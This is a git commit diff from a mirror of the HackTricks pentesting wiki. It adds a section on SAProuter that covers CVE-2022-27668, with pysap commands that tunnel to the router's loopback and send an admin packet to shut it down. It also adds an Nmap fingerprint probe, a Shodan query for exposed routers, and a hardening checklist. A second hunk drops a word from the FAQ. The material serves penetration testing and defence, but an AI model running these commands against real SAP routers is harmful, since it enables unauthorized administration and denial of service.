mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: Research Update: Enhanced src/network-services-pentesting/32...
This commit is contained in:
parent
f09a9494a9
commit
6a1805a247
@ -71,15 +71,75 @@ This approach underscores the importance of secure SAProuter configurations and
|
||||
|
||||
For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db).
|
||||
|
||||
---
|
||||
|
||||
## Recent Vulnerabilities (2022-2025)
|
||||
|
||||
### CVE-2022-27668 – Improper Access Control ➜ Remote Administrative Command Execution
|
||||
|
||||
In June 2022 SAP released Security Note **3158375** addressing a critical flaw (CVSS 9.8) in SAProuter (all kernels ≥ 7.22). An unauthenticated attacker can abuse permissive `saprouttab` entries to **send administration packets** (e.g. *shutdown*, *trace-level*, *connection-kill*) from a remote host, even when the router was started without the `-X` remote-admin option.
|
||||
|
||||
The issue results from the possibility to build a tunnel to the router’s own loopback interface by targeting the unspecified address **0.0.0.0**. Once the tunnel is established, the attacker gains local-host privileges and can run any admin command.
|
||||
|
||||
Practical exploitation can be reproduced with the **pysap** framework:
|
||||
|
||||
```bash
|
||||
# 1. Build a loopback tunnel through the vulnerable SAProuter
|
||||
python router_portfw.py -d <ROUTER_IP> -p 3299 \
|
||||
-t 0.0.0.0 -r 3299 \
|
||||
-a 127.0.0.1 -l 3299 -v
|
||||
|
||||
# 2. Send an admin packet (here: stop the remote router)
|
||||
python router_admin.py -s -d 127.0.0.1 -p 3299
|
||||
```
|
||||
|
||||
**Affected versions**
|
||||
|
||||
* Stand-alone SAProuter 7.22 / 7.53
|
||||
* Kernel 7.49, 7.77, 7.81, 7.85–7.88 (incl. KRNL64NUC/UC)
|
||||
|
||||
**Fix / Mitigation**
|
||||
|
||||
1. Apply the patch delivered with SAP Note **3158375**.
|
||||
2. Remove wildcard (`*`) targets from `P` and `S` lines in `saprouttab`.
|
||||
3. Make sure the router is started **without** the `-X` option and is **not** directly exposed to the Internet.
|
||||
|
||||
---
|
||||
|
||||
## Updated Tooling & Tricks
|
||||
|
||||
* **pysap** – actively maintained and provides `router_portfw.py`, `router_admin.py` & `router_trace.py` for crafting custom NI/Router packets, fuzzing ACLs or automating the CVE-2022-27668 exploit.
|
||||
* **Nmap** – extend service detection by adding the custom SAProuter probe:
|
||||
|
||||
```text
|
||||
Probe TCP SAProuter q|\x00\x00\x00\x00|
|
||||
ports 3299
|
||||
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
|
||||
```
|
||||
|
||||
Combine with NSE scripts or `--script=banner` to quickly fingerprint versions that leak the banner string (`SAProuter <ver> on '<host>'`).
|
||||
* **Metasploit** – the auxiliary modules shown above still work through a SOCKS or NI proxy created with pysap, enabling full framework integration even when the router blocks direct access.
|
||||
|
||||
---
|
||||
|
||||
## Hardening & Detection Checklist
|
||||
|
||||
* Filter port **3299/TCP** on the perimeter firewall – allow traffic only from trusted SAP support networks.
|
||||
* Keep SAProuter **fully patched**; verify with `saprouter -v` and compare against the latest kernel patch level.
|
||||
* Use **strict, host-specific** entries in `saprouttab`; avoid `*` wildcards and deny `P`/`S` rules that target arbitrary hosts or ports.
|
||||
* Start the service with **`-S <secudir>` + SNC** to enforce encryption and mutual authentication.
|
||||
* Disable remote administration (`-X`) and, if possible, bind the listener to `127.0.0.1` while using an external reverse proxy for required traffic.
|
||||
* Monitor the **dev_rout** log for suspicious `ROUTER_ADM` packets or unexpected `NI_ROUTE` requests to `0.0.0.0`.
|
||||
|
||||
---
|
||||
|
||||
## **References**
|
||||
|
||||
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
|
||||
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
|
||||
|
||||
## Shodan
|
||||
|
||||
- `port:3299 !HTTP Network packet too big`
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
|
||||
|
||||
> [!TIP]
|
||||
>
|
||||
> - **How can I cite a page of HackTricks?**
|
||||
> - **How can I a page of HackTricks?**
|
||||
|
||||
As long as the link **of** the page(s) where you took the information from appears it's enough.\
|
||||
If you need a bibtex you can use something like:
|
||||
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user